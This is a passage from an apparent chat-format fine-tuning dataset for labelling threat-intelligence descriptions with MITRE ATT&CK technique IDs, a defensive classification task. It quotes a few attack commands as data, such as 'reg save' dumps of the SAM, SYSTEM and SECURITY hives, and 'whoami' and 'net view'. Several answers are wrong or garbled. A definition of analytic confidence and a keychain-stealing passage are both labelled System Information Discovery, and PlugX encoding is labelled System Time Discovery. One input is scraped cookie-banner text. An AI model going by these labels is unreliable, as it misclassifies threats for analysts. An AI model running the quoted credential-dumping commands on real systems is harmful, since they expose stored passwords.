"content": "T1069 - Permission Groups Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The actors used a variety of utilities, including publicly available versions of WinRAR® , to archive collected data with password protection." }, { "role": "assistant", "content": "T1560.001 - Archive Collected Data: Archive via Utility" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "BISCUIT uses SSL for encrypting C2 communications." }, { "role": "assistant", "content": "T1573.002 - Asymmetric Cryptography" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Small Sieve can contact actor-controlled C2 servers by using the Telegram API over HTTPS." }, { "role": "assistant", "content": "T1071.001 - Application Layer Protocol: Web Protocols" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "contains keylogging functionality to steal passwords." }, { "role": "assistant", "content": "T1056 - Input Capture" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "SHOTPUT is obscured using XOR encoding and appended to a valid GIF file." }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "It reads and executes commands from a text file stored in Mega cloud storage" }, { "role": "assistant", "content": "T1530 - Data from Cloud Storage Object" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Ember Bear had used `cmd.exe` and Windows Script Host (wscript) to execute malicious code." }, { "role": "assistant", "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Evilnum has deleted files used during infection." }, { "role": "assistant", "content": "T1070.004 - Indicator Removal on Host: File Deletion" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "EXOTIC LILY has copied data from social media sites to impersonate targeted individuals." }, { "role": "assistant", "content": "T1593.001 - Social Media" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Its encoding method has been modified from time to time, aligned with major upgrade of PlugX itself" }, { "role": "assistant", "content": "T1124 - System Time Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "uses a backup communication method with an HTTP beacon." }, { "role": "assistant", "content": "T1008 - Fallback Channels" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Sibot has executed downloaded DLLs with \"rundll32.exe\"." }, { "role": "assistant", "content": "T1218.011 - Signed Binary Proxy Execution: Rundll32" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Two PDF files (***_SPE_LEOS and ***_HPC_SE) with aerospace & defense industry themed images, created via the Microsoft Print to PDF service, were submitted along with ***_ECS_EPM.docx. The naming convention of these PDF files was very similar to the malicious documents used. The name includes abbreviations for positions at the defense contractor much like the malicious documents. The Microsoft Print to PDF service enables content from a Microsoft Word document be printed to PDF directly. The PDFs were discovered in an archive file indicating that LinkedIn may have been a possible vector utilized by the adversaries to target victims. This is a similar vector as to what has been observed in a campaign reported by industry[7], however as mentioned earlier the research covered in this blog is part of a different activity set" }, { "role": "assistant", "content": "T1566.001 - Phishing: Spearphishing Attachment" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "An downloader uses the Windows command \"cmd.exe\" /C whoami. The group also uses a tool to execute commands on remote computers." }, { "role": "assistant", "content": "T1059 - Command and Scripting Interpreter" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "This tool was originally intended to aid defenders in simulating obfuscated PowerShell commands to better their defenses" }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "FunnyDream can monitor files for changes and automatically collect them." }, { "role": "assistant", "content": "T1119 - Automated Collection" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "SideCopy has sent spearphishing emails with malicious hta file attachments." }, { "role": "assistant", "content": "T1566.001 - Phishing: Spearphishing Attachment" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "KernelCallbackTable is initialized to an array of callback functions when user32.dll is loaded into memory, which are used whenever a graphical call (GDI) is made by the process. To hijack the control flow, malware replaces the USER32. _fnDWORD callback in the table with the malicious WMIsAvailableOffline function. Once the flow is hijacked and malicious code is executed the rest of the code takes care of restoring the KernelCallbackTable to its original state" }, { "role": "assistant", "content": "T1070 - Indicator Removal on Host" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "creates a backdoor through which remote attackers can retrieve system information, such as CPU speed, from Registry keys." }, { "role": "assistant", "content": "T1012 - Query Registry" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Carbanak has copied legitimate service names to use for malicious services." }, { "role": "assistant", "content": "T1036.004 - Masquerading: Masquerade Task or Service" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "TrickBot collects email addresses from Outlook." }, { "role": "assistant", "content": "T1087.003 - Email Account" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Low confidence generally means that the information's credibility and/or plausibility is questionable, or that the information is too fragmented or poorly corroborated to make solid analytic inferences, or that [there are] significant concerns or problems with the sources" }, { "role": "assistant", "content": "T1082 - System Information Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "can manipulate Registry keys." }, { "role": "assistant", "content": "T1112 - Modify Registry" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Gamaredon Group has registered multiple domains to facilitate payload staging and C2." }, { "role": "assistant", "content": "T1583.001 - Domains" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "A gh0st RAT variant has used rundll32 for execution." }, { "role": "assistant", "content": "T1218.011 - Signed Binary Proxy Execution: Rundll32" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "OilRig has used keylogging tools called KEYPUNCH and LONGWATCH." }, { "role": "assistant", "content": "T1056.001 - Input Capture: Keylogging" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Bisonal has relied on users to execute malicious file attachments delivered via spearphishing emails." }, { "role": "assistant", "content": "T1204.002 - User Execution: Malicious File" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT3 has a tool that exfiltrates data over the C2 channel." }, { "role": "assistant", "content": "T1041 - Exfiltration Over C2 Channel" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "PoshC2 contains a module for taking packet captures on compromised hosts." }, { "role": "assistant", "content": "T1040 - Network Sniffing" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "OutSteel has used `cmd.exe` to scan a compromised host for specific file extensions." }, { "role": "assistant", "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Cobalt Group has used a JavaScript backdoor that is capable of launching cmd.exe to execute shell commands. The group has used an exploit toolkit known as Threadkit that launches .bat files." }, { "role": "assistant", "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "CosmicDuke uses a keylogger." }, { "role": "assistant", "content": "T1056.001 - Input Capture: Keylogging" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "SombRAT can use a legitimate process name to hide itself." }, { "role": "assistant", "content": "T1036 - Masquerading" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "RDAT has used AES ciphertext to encode C2 communications." }, { "role": "assistant", "content": "T1573.001 - Symmetric Cryptography" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "GALLIUM used \"ipconfig /all\" to obtain information about the victim network configuration. The group also ran a modified version of NBTscan to identify available NetBIOS name servers." }, { "role": "assistant", "content": "T1016 - System Network Configuration Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "has the capability to download files." }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Leafminer used a tool called Total SMB BruteForcer to perform internal password spraying." }, { "role": "assistant", "content": "T1110.003 - Brute Force: Password Spraying" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "CookieMiner has used a Unix shell script to run a series of commands targeting macOS." }, { "role": "assistant", "content": "T1059.004 - Command and Scripting Interpreter: Bash" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "During Operation CuckooBees, the threat actors leveraged a custom tool to dump OS credentials and used following commands: `reg save HKLM\\\\SYSTEM system.hiv`, `reg save HKLM\\\\SAM sam.hiv`, and `reg save HKLM\\\\SECURITY security.hiv`, to dump SAM, SYSTEM and SECURITY hives." }, { "role": "assistant", "content": "T1003.002 - OS Credential Dumping: Security Account Manager" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Kimsuky has used Blogspot to host malicious content such as beacons, file exfiltrators, and implants." }, { "role": "assistant", "content": "T1608.001 - Upload Malware" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "When exploiting the intended targets, the threat actors used malicious .docx files to capture user credentials. The documents retrieved a file through a “file://” connection over SMB using Transmission Control Protocol (TCP) ports 445 or 139. When a user attempted to authenticate to the domain, the C2 server was provided with the hash of the password. Local users received a graphical user interface (GUI) prompt to enter a username and password, and the C2 received this information over TCP ports 445 or 139. Note: a file transfer is not necessary for a loss of credential information. Symantec’s report associates this behavior to the Dragonfly threat actors in this campaign. 1](link is external" }, { "role": "assistant", "content": "T1187 - Forced Authentication" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "MuddyWater has used C2 infrastructure to receive exfiltrated data." }, { "role": "assistant", "content": "T1041 - Exfiltration Over C2 Channel" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "jRAT can map UPnP ports." }, { "role": "assistant", "content": "T1120 - Peripheral Device Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "provides access using both standard facilities like SSH and additional access using its backdoor Espeon, providing a reverse shell upon receipt of a special packet" }, { "role": "assistant", "content": "T1059 - Command and Scripting Interpreter" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Ke3chang uses command-line interaction to search files and directories." }, { "role": "assistant", "content": "T1083 - File and Directory Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "If you continue browsing the site, you agree to the use of cookies on this website. If you continue browsing the site, you agree to the use of cookies on this website. Home - Explore Submit Search . - Upload - Login - Signup - Upload - Home - Explore - Login - Signup Activate your 30 day free trial to unlock unlimited reading. Facebook - Twitter - LinkedIn - Share - Email - - No Easy Breach DerbyCon 2016 . 22 . Share . Download to read offline . Every IR presents unique challenges. This talk will showcase the obstacles overcome during one of the largest and most advanced breaches Mandiant has ever responded to, the novel investigative techniques employed, and the lessons learned that allowed us to help remediate it. This talk will showcase the obstacles overcome during one of the largest and most advanced breaches Mandiant has ever responded to, the novel investigative techniques employed, and the lessons learned that allowed us to help remediate it. All rights reserved.24 Our Response: Increased PowerShell Visibility • Upgraded the environment to PowerShell 3.0 and enabled logging • Logging captured input/output, variable initialization, etc. Captured entire functions of PS scripts, attacker commands, script output, etc. Wrote indicators based on observed attacker activity • Identified lateral movement, unique backdoors, credential theft, data theft, recon, persistence creation, etc. Unlimited Reading . Learn faster and smarter from top experts . Unlimited Downloading . Download to take your learnings offline and on the go . You also get free access to Scribd" }, { "role": "assistant", "content": "T1059.001 - Command and Scripting Interpreter: PowerShell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "JCry has been observed deleting shadow copies to ensure that data cannot be restored easily." }, { "role": "assistant", "content": "T1490 - Inhibit System Recovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Volgmer stores the encoded configuration file in the Registry key \"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\WMI\\Security\"." }, { "role": "assistant", "content": "T1112 - Modify Registry" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "can be used to disable local firewall settings." }, { "role": "assistant", "content": "T1562.001 - Impair Defenses: Disable or Modify Tools" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The \"tDiscoverer\" variant of HAMMERTOSS establishes a C2 channel by downloading resources from Web services like Twitter and GitHub. HAMMERTOSS binaries contain an algorithm that generates a different Twitter handle for the malware to check for instructions every day." }, { "role": "assistant", "content": "T1102.003 - One-Way Communication" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "has exploited Microsoft Word vulnerability CVE-2014-4114 for execution." }, { "role": "assistant", "content": "T1203 - Exploitation for Client Execution" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "HyperBro has the ability to download additional files." }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "CrowdStrike also identified a connection between StellarParticle-related campaigns and the abuse of Microsoft Cloud Solution Partners’ O365 tenants. This threat actor abused access to accounts in the Cloud Solution Partner’s environment with legitimate delegated administrative privileges to then gain access to several customers’ O365 environments" }, { "role": "assistant", "content": "T1199 - Trusted Relationship" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The actors used a variety of public exploits, including CVE 2020-0688 and CVE 2020-17144 to gain privileged remote code execution on vulnerable Microsoft Exchange servers. In some cases, this exploitation occurred after valid credentials were identified by password spray, as these vulnerabilities require authentication as a valid user." }, { "role": "assistant", "content": "T1190 - Exploit Public-Facing Application" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "runs the net view /domain and net view commands." }, { "role": "assistant", "content": "T1018 - Remote System Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "has the ability to upload and download files from its C2 server." }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "is capable of logging keystrokes." }, { "role": "assistant", "content": "T1056 - Input Capture" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Kasidet has the ability to initiate keylogging and screen captures." }, { "role": "assistant", "content": "T1113 - Screen Capture" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Much like the original payload, this tool uses if/else statements to skip the legitimate code in the Saransh Email System source to run the malicious functions, which have the same method names as the original tool and follow the same call sequence: Form1.Speed Form1.diomadnfagaghagh Form1.fjcsERIfjfiojsGHIsdifjksi Form1.gsgjIDJIGJIGJIGJIFDOSpl Form1.FJaioefgkaoeK This chain of functions eventually loads a resource named ‘GSrdofjksrgj’, which the tool decrypts using the same algorithm and key as in the initial payload:byte[] array4 = new byte[] { 19, 129, 43, 37, 56, 65, 255, 75, 111, 19, 211, 120, 0, 49, 126, 248 };The decrypted payload has a SHA256 hash of 5e805a88294f6d25d55103d19d13e798e01ad70e6b89e9c58db5d468cc63b3d5, which is a variant of the NanoCore remote administration tool" }, { "role": "assistant", "content": "T1569.002 - System Services: Service Execution" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "SideCopy uses a loader DLL file to collect AV product names from an infected host." }, { "role": "assistant", "content": "T1518.001 - Software Discovery: Security Software Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "OilRig has used the Plink utility and other tools to create tunnels to C2 servers." }, { "role": "assistant", "content": "T1572 - Protocol Tunneling" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Zeus Panda decrypts strings in the code during the execution process." }, { "role": "assistant", "content": "T1140 - Deobfuscate/Decode Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "OSX_OCEANLOTUS.D has a variant that is packed with UPX." }, { "role": "assistant", "content": "T1027.002 - Obfuscated Files or Information: Software Packing" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "JSS Loader can download and execute JavaScript files." }, { "role": "assistant", "content": "T1059.007 - Command and Scripting Interpreter: JavaScript" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Windigo has used a script to check for the presence of files created by OpenSSH backdoors." }, { "role": "assistant", "content": "T1083 - File and Directory Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Silence has sent emails with malicious DOCX, CHM, LNK and ZIP attachments." }, { "role": "assistant", "content": "T1566.001 - Phishing: Spearphishing Attachment" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "KeyBoy uses Python scripts for installing files and performing execution." }, { "role": "assistant", "content": "T1059.006 - Command and Scripting Interpreter: Python" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "There are three types of URLs present in the decrypted configuration. The first type of URL listed in the configuration data is used for the plain HTTP (that is, non-Tor) communication with C&C servers. The bot reports to the C&C server using the typical request pattern: for example, the initial checkin to the C&C server is in the form of: cfg_url + “/images/” + encoded_data + (.jpeg||.gif||.bmp" }, { "role": "assistant", "content": "T1132 - Data Encoding" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "QAKBOT uses obfuscation across two script files, a JavaScript (.js) file and a Batch Script (.cmd) file, likely in an effort to conceal suspicious-looking command lines. " }, { "role": "assistant", "content": "T1059 - Command and Scripting Interpreter', 'T1059.007 - Command and Scripting Interpreter: JavaScript', 'T1059.003 - Command and Scripting Interpreter: Windows Command Shell', 'T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Actors used the netstat command to display TCP connections, prevent hostname determination of foreign IP addresses, and specify the protocol for TCP." }, { "role": "assistant", "content": "T1049 - System Network Connections Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Orz can gather victim drive information." }, { "role": "assistant", "content": "T1083 - File and Directory Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "H1N1 bypasses user access control by using a DLL hijacking vulnerability in the Windows Update Standalone Installer (wusa.exe)." }, { "role": "assistant", "content": "T1548.002 - Abuse Elevation Control Mechanism: Bypass User Account Control" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "In addition, the threat actors created a scheduled task named reset, which was designed to automatically log out of their newly created account every eight hours" }, { "role": "assistant", "content": "T1053.005 - Scheduled Task/Job: Scheduled Task" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "HAWKBALL has downloaded additional files from the C2." }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Hooking module – hooks a hardcoded set of WinAPI and (if they exist) Mozilla DLL Hooking is used to perform web injects, sniff traffic and keyboard data and even prevent DNS resolution of certain domains. Hooking works in the following way: QakBot injects a hooking module into the appropriate process, the module finds functions from the hardcoded set and modifies the functions so they jump to custom code" }, { "role": "assistant", "content": "T1055 - Process Injection" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The developer rewrote a large part of the code however the workflow is the same as previously and some features are copy/paste. The biggest change is the network communication with the C2 server. The malware does not use a raw socket anymore but all the communications are performed with WinInet. The malware performs connection to the C2 server by using InternetOpenA() with an hardcoded User-Agent: \"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322\". Note the missing parenthesis at the end of the User-Agent. This variant has exactly the same features as the previous variant: file listing, OS version getting, process killing, drive listing, execution via ShellExecuteW(), execution via named pipe, cleaning, file removal, file downloading. Here is an example of code similarities on the execution via named pipe function. On the left a sample from Bisonal 2014 and on the right Bisonal 2011. The code is not exactly the same but the workflow and some constants are similar" }, { "role": "assistant", "content": "T1573.001 - Symmetric Cryptography" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "GALLIUM used WMI for execution to assist in lateral movement as well as for installing tools across multiple assets." }, { "role": "assistant", "content": "T1047 - Windows Management Instrumentation" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "KillDisk registers as a service under the Plug-And-Play Support name." }, { "role": "assistant", "content": "T1036.004 - Masquerading: Masquerade Task or Service" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Here is an example of the result of ps ax on an infected system: $ ps ax[...] 566 ?? Ss 0:00.01 /usr/libexec/icloudsyncd -launchd netlogon.bundle[...] Figure 8: Result of ps ax on an infected system Keychain stealing The OSX/Keydnap backdoor is equipped with a mechanism to gather and exfiltrate passwords and keys stored in OS X’s keychain" }, { "role": "assistant", "content": "T1082 - System Information Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "In April 2018 we discovered a new Octopus sample pretending to be Telegram Messenger with a Russian interface. We couldn´t find any legitimate software that this malware appears to be impersonating; in fact, we don´t believe it exists. Kaspersky Lab products detect the Octopus Trojan as Trojan.Win32.Octopus.gen" }, { "role": "assistant", "content": "T1036 - Masquerading" } ] }, 